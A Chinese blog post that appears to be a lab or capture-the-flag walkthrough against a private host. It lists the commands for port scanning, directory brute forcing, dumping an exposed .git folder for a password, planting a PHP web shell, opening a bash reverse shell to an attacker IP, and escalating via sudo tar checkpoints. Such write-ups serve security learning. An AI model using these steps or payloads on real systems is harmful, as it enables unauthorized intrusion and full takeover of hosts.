kizumi_header_banner_img

这里是幻灬十一的博客,欢迎来到我的世界

加载中

文章导读

0605-vb-08


avatar
11 2026年7月29日 20

一、扫描端口

命令:nmap -T4 10.10.1.211

二、爆破目录

命令:gobuster dir -u http://10.10.1.211/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,inc,bak,sql,phtml,zip -t 50

下面的几个都是页面或者代码,进入最上面的.git里面去

进入了一个登录页面,尝试注入失败

branches/早期 Git 遗留目录,新版几乎不用,存放分支简易信息,现在基本为空,扫描价值极低

hooks/存放 Git 自动执行脚本模板

info/存放所有操作日志

objects/Git 所有文件、提交记录、代码快照全部存在这里,分两层目录存储哈希对象:

refs/

存放所有分支、标签的哈希指针,分 3 个子目录:
  1. heads/:本地所有分支(main/master/dev 等),每个文件存对应分支最新 commit 哈希
  2. remotes/:远程仓库所有分支记录
  3. tags/:版本标签

 

可以看到.git这个文件系统下的全部东西

里面的东西大多是一下哈希代码,我们找到了一个日志文件的

三、寻找密码

命令:wget -r –no-parent http://10.10.1.211/.git/(下载.git这个使用数据到本地)

命令:git log –oneline(查看历史更更改)

命令:git show 6750a2d6dadda236ab020c1e15bbcf0991a0001c(查看在上面我们拿到的日志哈希)

四、登录后插入木马

命令:<?php system($_GET[‘cmd’]); ?>

五、尝试调用并反弹连接

命令:http://10.10.1.211/templates/footer.php?cmd=id

命令:curl -s -G –data-urlencode “cmd=bash -c ‘bash -i >& /dev/tcp/10.10.1.188/4444 0>&1′” http://10.10.1.211/templates/footer.php

六、提权

命令:sudo -l

命令:sudo tar -cf /tmp/test.tar /tmp –checkpoint=1 –checkpoint-action=exec=/bin/bash

七、寻找flag

命令:grep -rni “flag{” / 2>/dev/null



评论(0)

查看评论列表

暂无评论


发表评论

表情 颜文字
插入代码

站点统计

📄 文章 32
📁 分类 4
🏷️ 标签 0
📝 总字数 337k
⏱️ 运行 483天
头像
关于本站
在代码和动漫的夹缝里收集细碎美好
欢迎同好交流、素材互换
站点持续装修优化中✨